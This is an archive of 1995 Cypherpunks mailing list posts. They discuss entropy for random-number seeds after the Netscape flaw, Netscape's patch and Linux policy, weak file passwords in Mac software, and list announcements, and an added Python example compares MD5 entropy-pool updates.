iQBFAwUBMGRoeyoZzwIn1bdtAQGg4wF/XTLT2U7mXi2MZ5pgSZQMd9VdLZJcp5MD
wgBWaGCNIzsQnkwB4ZkTyjJAOwFf0OkJ
=+ZRt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 23 Sep 95 17:30:41 PDT
To: wb8foz@nrk.com
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <199509240029.RAA22318@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:29 PM 9/23/95 -0400, you wrote:
>Can you take the time between two effectively async events, and use the
>low order bits of same?
>For example, time between a netverk pack arriving and the next tick of
>the TOD clock? And/or the system's disk IO or such? 

You might get some entropy there, but you can get more (though perhaps not
measurably more) by using the values of both instead.  For instance
        rand = MD5(rand, lowbits(T(clock) - T(packet)))
vs      rand = MD5(rand, T(clock), T(packet))

As long as you're not overoptimistic about how many real bits you've gotten,
might as well actually use the version that keeps more low-quality bits
than try to improve them.  Also, do watch out for things that aren't
really asynchronous, e.g. the next clock tick will probably happen at
some even multiple of 1000000/Hz microseconds.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
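
The two pool updates from the message above, as an added example that is not part of the original post. It counts how many distinct pool values each update can reach over a set of candidate event times, and repeats the count when the "second event" is the next clock tick. The 100 Hz tick rate, the 8 low bits and all timestamps are constructed assumptions; MD5 is used only because the message uses it.

```python
import hashlib
import math
import struct

HZ = 100                    # assumed TOD clock rate (ticks per second)
TICK_US = 1_000_000 // HZ   # ticks land on multiples of 1000000/Hz microseconds
SEED = b"\x00" * 16         # constructed starting pool value


def _mix(pool, *values):
    """rand = MD5(rand, v1, v2, ...) with each value packed as 64 bits."""
    h = hashlib.md5(pool)
    for v in values:
        h.update(struct.pack(">Q", v & 0xFFFFFFFFFFFFFFFF))
    return h.digest()


def mix_difference(pool, t_clock, t_packet, nbits=8):
    """rand = MD5(rand, lowbits(T(clock) - T(packet)))"""
    return _mix(pool, (t_clock - t_packet) & ((1 << nbits) - 1))


def mix_both(pool, t_clock, t_packet):
    """rand = MD5(rand, T(clock), T(packet))"""
    return _mix(pool, t_clock, t_packet)


def next_tick(t_packet):
    """First clock tick strictly after t_packet (microseconds)."""
    return (t_packet // TICK_US + 1) * TICK_US


def reachable_states(mixer, events):
    """Number of distinct pool values one update can produce over the
    candidate (t_clock, t_packet) pairs an observer cannot rule out."""
    return len({mixer(SEED, c, p) for c, p in events})


def compare():
    # Constructed sample data: 50 packet times, 20 possible intervals.
    packets = [5_000_000 + 7919 * i for i in range(50)]
    deltas = [3 + 11 * j for j in range(20)]          # all below 2**8

    # Case 1: the second event is unrelated to the first.
    async_events = [(p + d, p) for p in packets for d in deltas]
    # Case 2: the "second event" is the next clock tick, fixed by t_packet.
    tick_events = [(next_tick(p), p) for p in packets]

    return {
        "async_difference": reachable_states(mix_difference, async_events),
        "async_both": reachable_states(mix_both, async_events),
        "tick_both": reachable_states(mix_both, tick_events),
        "packet_only": reachable_states(lambda s, c, p: _mix(s, p), tick_events),
    }


if __name__ == "__main__":
    for name, n in compare().items():
        print(f"{name:17s} {n:5d} states  <= {math.log2(n):.2f} bits")
```

The log2 of each count is an upper bound on the entropy one update can add. In the tick case, hashing the clock value as well reaches exactly as many states as hashing the packet time alone.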





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 23 Sep 95 15:42:33 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <9509221532.AA19315@cantina.verity.com>
Message-ID: <199509232229.SAA00612@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


As a hardware type, I'd prefer a diode noise generator over a
radioactivity detector. I'd hate for the Fort to be tempted to fudge the
latter's output by flooding my house from a black helicopter...

But lacking same....

Can you take the time between two effectively async events, and use the
low order bits of same?

For example, time between a netverk pack arriving and the next tick of
the TOD clock? And/or the system's disk IO or such? 

Or: Choose a site at random. Ping it. Use low order bits of that time
with something above.

I'm sure most such schemes are not usable. But all it takes is one...

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 23 Sep 95 16:01:07 PDT
To: cypherpunks@toad.com
Subject: Need Pathfinder "Cypherpunks" password
Message-ID: <199509232259.SAA12058@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

What is the Cypherpunks password to be used with Pathfinder, Time-Warner's
web site?

TIA,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGSROioZzwIn1bdtAQHi2AGAi18zy9bn/EvI65yoyqAPcQonmp3gaB7y
Di2Jqq0KLUZFR4fzvwxoM4ZVWNfafQ7r
=wBeD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Paquin <paquin@netscape.com>
Date: Sat, 23 Sep 95 19:09:40 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <43tmht$qfe@tera.mcom.com>
Message-ID: <3064BDFB.717F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


> And the sad part is that now that they have announced that they are
> dropping their unofficial Linux support, 

I have no current plans to alter our treatment of Linux.  It is not now,
nor has it ever been, a supported platform.  We do build for it,
and some people are happy about that.

I have not constructed a business case which would cause Netscape
to begin support for Linux versions of the Navigator.  Right now, I'm 
not sure that making a point of this would do what you want.

Either of the two above paragraphs could be changed with time.

--
Tom Paquin                 +1(415)528-2607      fax +1(415)528-4122
Netscape Communications    501 E Middlefield    Mt View, CA 94043 USA



PS. I think that you are all doing a really great job!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Money & Investing Update <WSJ-ANNOUNCE@LIME.EASE.LSOFT.COM>
Date: Sat, 23 Sep 95 16:39:16 PDT
To: Multiple recipients of list WSJ-ANNOUNCE             <WSJ-ANNOUNCE@PEACH.EASE.LSOFT.COM>
Subject: Important Announcement from Money & Investing Update
Message-ID: <9509232338.AA15228@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The Wall Street Journal's Money & Investing Update (http://update.wsj.com)
has now introduced Company Briefing Books, a major product enhancement that
enables Update readers to get a rich, up-to-the-minute background report on
any company in the news.

Briefing Books are highly graphical compilations of recent news, stock
charts, and financial data, available on more than 6,500 U.S. and
international companies. They include news from The Wall Street Journal and
Dow Jones newswires, as well as background reports and performance data from
other leading information sources.

Money & Investing Update editors now include direct hyperlinks to Briefing
Books from nearly every significant mention of a company in Update stories
and tables. In addition, readers can ask for a Briefing Book on a company of
their choosing at any time simply by entering a company name or stock symbol.

The Money & Investing Update is at http://update.wsj.com. If you haven't
read the Update in a while, please try this important new feature. You can
go directly to a Briefing Book request form at this URL:
http://update.wsj.com/briefingbook/inap/search.html.

Best wishes,
The Editors and Staff of Money & Investing Update

----------------------
For further information,  contact us at info@update.wsj.com or call customer
support at 1-800-369-2834.

If you would prefer not to receive any future email from the Money &
Investing Update please send email to "LISTSERV@PEACH.EASE.LSOFT.COM"
In the body of your message please type "UNSUBSCRIBE WSJ-ANNOUNCE"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sat, 23 Sep 95 13:44:23 PDT
To: cypherpunks@toad.com
Subject: Re: HEY!!! WAS: The Next Hack
In-Reply-To: <199509231217.FAA27504@usr1.primenet.com>
Message-ID: <441rhh$bpi@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509231217.FAA27504@usr1.primenet.com>, carolann@censored.org (Censored Girls Anonymous) writes:
> You HAD stated a patch would be available by Friday.
> Now we are at early next week.

  This is what our press release said:

	An updated version of Netscape Navigator 1.1 for Mac OS
	and Unix and Netscape Navigator 1.2 for Windows 3.1 and
	Windows 95 will be available for downloading by existing
	customers on the Internet next week.

There is still a link to it on our home page.
All press accounts I've seen (this is not exhaustive!!) have also
said early next week.

  I don't have an archive of every message I've sent to this list,
so I can't check myself, but if I somehow led you to believe that the
fix would be out Friday, then I apologize.  You can look at this
url for the official company statement:

	http://home.netscape.com/newsref/std/random_seed_security.html

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sat, 23 Sep 95 13:57:18 PDT
To: cypherpunks@toad.com
Subject: Re: The Next Hack
In-Reply-To: <4407p5$on4@tera.mcom.com>
Message-ID: <441s9c$for@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509231919.MAA01818@infinity.c2.org>, sameer@c2.org (sameer) writes:
> > 
> >   What exactly is the point of this?  We have:
> 
> 	Is Netscape going to cover the cost of getting the new keys
> that the servers generate signed and certified by Verisign? Is netscape
> going to tell its customers that they need to regenerate their
> keys and get new certificates?

  I'm not sure what exactly you mean by "cover the cost".  Our server
customers WILL NOT have to pay verisign for new certificates.  We will
tell all of our customers to generate new keys and get new certificates
ASAP.  We are putting the version number in new certificate requests
so that verisign can reject requests from people who don't have the
new version of the key generator.

  Server operators will also be able to set up their servers to detect
unpatched clients and redirect them to a page that will allow them
to download the patch.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 23 Sep 95 21:38:27 PDT
To: "Christopher J. Shaulis" <cjs@netcom.com>
Subject: Re: Netscape for Linux?
Message-ID: <199509240436.VAA28304@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 PM 9/23/95 -0400, you wrote:
>It seems to me that you folks are going out of your way to deny the
>fact that the Linux market exists. I think that it's because you are
>embarrassed that all these people with a $20 operating system are
>throwing money at you while all the folks with $10K operating systems
>aren't talking to you at all. 
>
>While you may WANT to have all your sales be for OSF/1 machines or
>solaris, but refusing to support Linux and ignoring the demand for
>your products by the Linux community just because you don't think it
>would sound as impressive, is actually quite childish and doesn't make
>any financial sense.

Foo.  Supporting applications in a professional way on Linux is _tough_;
everybody's got their own self-hacked copy that may have started out as
SlackOS 4.1.3 but has the TooManyNotes Sound Widget replacement and has the 
XBrokenX video driver instead of the original one that didn't work
on the TiltedSquareSneakyVideoCard and a way-cool new Obfuscated File System.
It's like supporting things on "Unix" was back when everybody had source and
a different flavor of M680x0 box.  You can't just ask "Have you changed the
AUTOEXEC.BAT since the machine came from the factory?" like Windoze app-vendors.
Netscape may not have ever been _compiled_ with the compiler version the
user has, much less tested on that kernel version, and the user may or may
not know if their X Window System really is installed right or the TCP/IP
connection works well and has working DNS support.

Sure, it's easy to charge money for shipping the stuff with a diskette and
a manual, but not doing so until they're ready to provide high-quality support
isn't childishness, it's ethics (well, and/or bad-reputation-avoidance.)
Now, I haven't checked whether they've trained all their people who answer
phone calls from the public to acknowledge that there is an unsupported
Linux version for folks who don't mind dealing with unsupported software,
or if they've even got it on their Web site; the current version is there
for ftp.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sat, 23 Sep 95 20:50:08 PDT
To: paquin@netscape.com (Tom Paquin)
Subject: Re: Netscape for Linux?
In-Reply-To: <3064BDFB.717F@netscape.com>
Message-ID: <199509240243.WAA00266@hoopsnake.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > And the sad part is that now that they have announced that they are
> > dropping their unofficial Linux support, 
> 
> I have no current plans to alter our treatment of Linux.  It is not now,
> nor has it ever been, a supported platform.  We do build for it,
> and some people are happy about that.
>
> I have not constructed a business case which would cause Netscape
> to begin support for Linux versions of the Navigator.  Right now, I'm 
> not sure that making a point of this would do what you want.

I'll say some people are happy about it. 

You just recently turned down an order for 230 copies of the netscape
navigator for Linux, and as you folks aren't making any money, you can
only wonder why.

You have also turned down numerous other attempts by various people to buy
both quantities of navigators and server software for Linux.

It seems to me that you folks are going out of your way to deny the
fact that the Linux market exists. I think that it's because you are
embarrassed that all these people with a $20 operating system are
throwing money at you while all the folks with $10K operating systems
aren't talking to you at all. 

While you may WANT to have all your sales be for OSF/1 machines or
solaris, but refusing to support Linux and ignoring the demand for
your products by the Linux community just because you don't think it
would sound as impressive, is actually quite childish and doesn't make
any financial sense.

Christopher



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hshubs@BIX.com
Date: Sat, 23 Sep 95 20:08:29 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Lite
Message-ID: <9509232307.memo.6018@BIX.com>
MIME-Version: 1.0
Content-Type: text/plain


Would the person who does this, or someone who can point me at him, contact
me via e-mail please?  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Sat, 23 Sep 95 20:30:36 PDT
To: hshubs@BIX.com
Subject: Re: Cypherpunks Lite
In-Reply-To: <9509232307.memo.6018@BIX.com>
Message-ID: <Pine.SUN.3.91.950923232509.15559A-100000@dorsai.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 23 Sep 1995 hshubs@BIX.com wrote:

> Would the person who does this, or someone who can point me at him, contact
> me via e-mail please?  

I don't run the actual Cypherpunks Lite list, however I do run a free 
filtering service of the same sort... basically stick to news and 
technical stuff, as well as other miscellaneous interesting stuff, but don't 
forward whole threads, or flames, etc...

If you want in, let me know in email and I'll add you to the list.


==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sun, 24 Sep 95 00:04:03 PDT
To: cypherpunks@toad.com
Subject: Apology to Netscape.
Message-ID: <199509240703.AAA20745@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jeff Weinstein corrected me with:

>  This is what our press release said:
>
>	An updated version of Netscape Navigator 1.1 for Mac OS
>	and Unix and Netscape Navigator 1.2 for Windows 3.1 and
>	Windows 95 will be available for downloading by existing
>	customers on the Internet next week.

My apologies for the misquote.
 
It only then makes the trading facts worse.

Love Always,

Carol Anne
ps On the asides kind of things, do you realize the Netscape stock 
   base of 5,000,000  shares is not a big sharebase? Coca-Cola's is
   1,300,000,000. And by standards, your stock is really unstable.
   If Coca-Cola moves 3 points there'll be a trading halt, for the
   buying/selling imbalance will be too much. Even if only for 1 min.
   The trading halt gets the good or bad news onto "The Street".
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGUCaYrpjEWs1wBlAQF9ZAP6AkMCsveSU/E8KFDi84urnAR2KlXT42rS
l+9tHh33ZWbM6VmHUMkqelM11vc7zU1eWLhXlYHaoOqwGuTef9irQigbnr+HwYKL
Px9480/Chm59RWCG6j4pp4d0xUQO9Pj0lbpIecn72eDYReRIgh5+MU0jOCNdUNLe
RvP7XvYI570=
=Nb9y
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eyes@amazon.com
Date: Sun, 24 Sep 1995 04:12:23 -0700
To: adam@lighthouse.homeport.org
Subject: Amazon.com Books -- personal notification service
Message-ID: <199509241112.EAA03484@ernie.amazon.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, as per your request, we at Amazon.com Books are notifying you of
new books matching the following criteria:
 
      subjects include "Cryptography"
 
The new books are listed at the end of this message.  If you're
interested in any of these books you can order them online at
http://www.amazon.com/
 
     Your most humble automated search agent,
 
          Eyes
          Amazon.com Books
          http://www.amazon.com/
 
P.S.  Please don't forget that Amazon.com Books has over one million
titles for you to choose from, many discounted 10 to 40 percent off
the list price.  If you have any online friends who might enjoy
Amazon.com Books, we'd really appreciate you spreading the word!
Thank you!
 
------------------------------------------------------------------------
"Advances in Cryptology--Eurocrypt-94 : Workshop on the Theory and 
 Application of Cryptographic Techniques, Perugia, Italy, May 1994 : 
 Proceedings)"

by

Alfredo De Santis

List Price: currently unknown

Subjects: Computer security, Cryptography

Publisher: 
Binding: Hardcover
Expected publication date: September 1995
ISBN: 3540601767

------------------------------------------------------------------------
"Enigma : A Novel"

by

Robert Harris, David Rosenthal(Editor)

List: $23.00 -- Amazon.com Price: $20.70 -- You Save: $2.30 (10%)

Subjects: World War, 1939-1945, Secret service, Great Britain, 
          Fiction, Cryptography

Publisher: Random House
Binding: Hardcover
Expected publication date: October 1995
ISBN: 0679428879

------------------------------------------------------------------------
"Pass It On! : All About Notes, from Secret Codes and Special Inks to 
 Fancy Folds and Dead Man's Drops"

by

Sharon Bailly, Anne Canevari Green(Illustrator)

List: $18.90 -- Amazon.com Price: $18.90

Subjects: Cryptography, Juvenile literature, Writing

Publisher: Millbrook Pr
Binding: Library Binding
Expected publication date: September 1995
ISBN: 1562945882

----- End of forwarded message from eyes@amazon.com -----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Sun, 24 Sep 95 15:45:41 PDT
To: cypherpunks@toad.com
Subject: Lynx (or approx for Windows)?
Message-ID: <m0swznj-00062nC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 24 Sep 95 at 18:10, SysAdmin wrote:


> Screw 'em. If they want to be the defacto standard for *some* OS's
> but not all, someone else will come along and fill in the gap.
> Besides, they already made the point that they don't want to make
> money so why change the status quo. All the more reason to show the
> weaknesses of the product before others get sucked in. I'll stick to
> TkWWW and Lynx thank you.

Sounds odd, but would there be something like Lynx available for
Windows, preferably with forms features fixed?  I don't browse for
the pretty pictures and turning the graphics off in Nutscrape doesn't
speed it up much. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Sun, 24 Sep 95 10:19:57 PDT
To: cypherpunks@toad.com
Subject: Found on usenet: ACLU -- "Big Brother and the power of the Net"
Message-ID: <v01530500ac8b4bdecd46@[199.171.88.78]>
MIME-Version: 1.0
Content-Type: text/plain


                    The Midpeninsula Chapter of
        American Civil Liberties Union of Northern California
            presents a free program, open to the public

Speaker:  Jim Warren, MicroTimes correspondent, originator of the West
          Coast Computer Faire, PBS Computer Chronicles and numerous
          other enterprises

Topic:    Big Brother and the power of the Net

Time:     Tuesday, October 17, 1995 at 8:00 pm

Place:    Mandarin Classic Restaurant; First & Main Streets, Los Altos

There is no fee and no reservation is required for those coming just
for the program, but this is the annual meeting of the Midpeninsula
Chapter and is preceded by a reception and dinner that are open to the
public, but for which a reservation is required (see below).

        6:00 pm Reception and no-host bar
        7:00 pm Dinner
        8:00 pm Jim Warren speaks

-------------------------------------------------------------------------

                            Dinner Reservation
                Please return by Friday, October 6, 1995

Dinner reservation for ____ person(s)

Check for $ _____ ($25 per person) is enclosed.  Please make check payable
to ACLU Mid-peninsula.

Mail to:  Iris Barrie                   If you have questions, call:
          4250 El Camino, D-138         Iris Barrie at 415-856-0193
          Palo Alto, CA  94306

--
Les Earnest (les@cs.stanford.edu)               Phone:  415 941-3984
Computer Science Dept.; Stanford, CA 94305        Fax:  415 941-3934

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sun, 24 Sep 95 10:34:20 PDT
To: dmandl@panix.com (David Mandl)
Subject: Re: macworld crypto articles
In-Reply-To: <v01530501ac8b23d65a53@[166.84.250.21]>
Message-ID: <9509241729.AA17667@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave,

> At 3:49 PM 9/23/95, steven ryan wrote:
> >They searched for an applications programmer *UN*skilled at cryptography to
> >try and crack the password protection of the 8 best selling Mac programs.
> >Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours.
> 
> Yup, pretty amazing.  I only skimmed the article, but I believe that out of
> all the programs he tried, there was only one whose crypto he couldn't
> crack.  I found it all a little hard to believe.  I mean, even if they used
> the most obsolete algorithm, wouldn't you have to know _something_ about
> cryptanalysis to crack it?  Are these vendors just putting a "this file is
> locked with this such and such a password" string at the front of the file,
> or what?

I hate to say it, but in the case of Quicken, this is exactly right.

In version 5.0, we've taken measures to protect the online financial
stuff, but there's no serious protection at all on the local data
file.  It's truly a deplorable state of affairs.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Sun, 24 Sep 95 10:50:36 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Netscape for Linux?
In-Reply-To: <199509240436.VAA28304@ix5.ix.netcom.com>
Message-ID: <199509241746.KAA01423@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain



On September 23, Bill Stewart wrote:

> 
> Foo.  Supporting applications in a professional way on Linux is _tough_;
> 
              <Disparaging comments about Linux deleted>

As a Linux user and advocate, I've gotta agree here.  I'm glad that
Netscape is going to continue to supply us with an unsupported binary,
and I can't blame them a bit for not wanting to support an OS where
every user has his own private version number ... would be nice if we
could get 128 bit keys, though ... (hint, hint).

As for your other comments about Linux - would you care to take off your
coat and meet me in Comp.os.flamewars sometime?  ;-)

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sun, 24 Sep 95 08:12:53 PDT
To: steven ryan <sryan@reading.com>
Subject: Re: macworld crypto articles
Message-ID: <v01530501ac8b23d65a53@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:49 PM 9/23/95, steven ryan wrote:
>They searched for an applications programmer *UN*skilled at cryptography to
>try and crack the password protection of the 8 best selling Mac programs.
>Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours.

Yup, pretty amazing.  I only skimmed the article, but I believe that out of
all the programs he tried, there was only one whose crypto he couldn't
crack.  I found it all a little hard to believe.  I mean, even if they used
the most obsolete algorithm, wouldn't you have to know _something_ about
cryptanalysis to crack it?  Are these vendors just putting a "this file is
locked with this such and such a password" string at the front of the file,
or what?

Interesting historical note: In my old APL days (early 80's), IBM used to
lock their VSAPL workspaces with just such a scheme--a "locked bit" at some
fixed position in the file.  But there were enough other reasons not to use
that horrible product...

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 24 Sep 95 09:34:17 PDT
To: cypherpunks@toad.com
Subject: Amazon.com Books -- personal notification service (fwd)
Message-ID: <199509241634.MAA18446@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


	Amazon.com books (which someone mentioned here a few days ago)
has a free personal notification service for new books of interest.
They also claim not to sell your preferences if you so request.

	They have Springer-Verlag conference proceedings, and books by
Hakim Bey.  I spent a while telling them all about whose new books I'd
like to hear about, and this came to me today.

Adam

----- Forwarded message from eyes@amazon.com -----

From owner-cypherpunks  Sun Sep 24 11:12:27 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA26138; Sun, 24 Sep 95 11:12:27 PDT
Received: from dfw.net by toad.com id AA26128; Sun, 24 Sep 95 11:12:25 PDT
Received: by dfw.net (4.1/SMI-4.1)
	id AA15489; Sun, 24 Sep 95 13:10:15 CDT
Date: Sun, 24 Sep 1995 13:10:14 -0500 (CDT)
From: Aleph One <aleph1@dfw.net>
Cc: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <199509241746.KAA01423@goblin.punk.net>
Message-Id: <Pine.SUN.3.90.950924130608.15010A-100000@dfw.net>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-cypherpunks@toad.com
Precedence: bulk

I must agree that supporting something like that client that everyone wants
to use in their own configuration is not an easy thing. But there are many 
ISPs using linux as web servers. I for one would buy a few servers myself.
It's a shame netscape does not make an agreement with someone like Red Hat 
(a commercial linux vendor) and supply a server for use with it. I am sure 
if they can support a server for BSDI (therefore FreeBSD and NetBSD) they 
can support one for Red Hat (and therefore Linux). But this does not 
belong in cypherpunks anymore. Nor are the people making these decisions on 
this list anyway.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 


From owner-cypherpunks  Sun Sep 24 19:36:05 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA07105; Sun, 24 Sep 95 19:36:05 PDT
Received: from mail.pilot.net (ns.pilot.net) by toad.com id AA07088; Sun, 24 Sep 95 19:35:40 PDT
Received: from verity.com (unknown-143-5.verity.com [192.187.143.5]) by mail.pilot.net (8.7/8.7.Beta.12) with SMTP id OAA02753; Sun, 24 Sep 1995 14:40:26 -0700 (PDT)
Received: from cantina.verity.com by verity.com (4.1/SMI-4.1_Verity-Main-950202)
	id AA08688; Sun, 24 Sep 95 13:47:42 PDT
Received: by cantina.verity.com (5.x/SMI-SVR4)
	id AA20998; Sun, 24 Sep 1995 13:45:20 -0700
Date: Sun, 24 Sep 1995 13:45:20 -0700
From: patrick@verity.com (Patrick Horgan)
Message-Id: <9509242045.AA20998@cantina.verity.com>
To: cypherpunks@toad.com, rsalz@osf.org
Subject: Re: Defense against a class of programming bugs
Cc: dce-web@osf.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Sun, 24 Sep 95 10:46:20 PDT
To: cypherpunks@toad.com
Subject: Re: macworld crypto articles
In-Reply-To: <4444rl$nrh@life.ai.mit.edu>
Message-ID: <199509241745.NAA20271@toast.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <4444rl$nrh@life.ai.mit.edu> Chen writes:
> It's truly a deplorable state of affairs.

For the next version, include PGP free with every version of Quicken,
and have Quicken just "call" PGP.

Of course, users can encrypt their files now with PGP.  Is there an
Intuit bboard where someone could post instructions?
-- 

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Sun, 24 Sep 95 13:09:19 PDT
To: cypherpunks@toad.com
Subject: Entropy VI: "Shannon's Choice" (with apologies to Wm. Styron)
Message-ID: <JhbZwkkAsOII085yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm always glad to see stuff here about entropy:  it's a topic that
comes up in PGP 101 when locals ask, "How long should my passphrase be?"
and, as we've seen recently, failure to generate adequate entropy for
pseudo-random numbers is often the Achilles' Heel of otherwise solid
cryptosystems.

I found some info about Shannon's choice of the word "entropy" in an
unexpected source lately.  I had some free time this week due to the
surprise snowstorm here, and used it to type in a few paragraphs.
This is intended less for immediate discussion than for the list's
archives, so that I can point folks to it in the future.  And I'm
not going to cite the source, to avoid copyright infringement
nastygrams...if you know who the author is, keep it to yourself:
you'll only suffer public ridicule and loss of "reputation capital"
for Not Watching Enough TV!!! :-)

N.B. -- some of this impresses me as pompous bullshit, and I'm not in
agreement with it.  But the story about von Neumann made it a worthwhile
read, at least to me.
==================================================================

I want now to turn to another juncture in the cascading bifurcations
that mark interpretations of Maxwell's Demon.  The juncture occurs when
Leon Brillouin and Claude Shannon diverge in their opinions about what
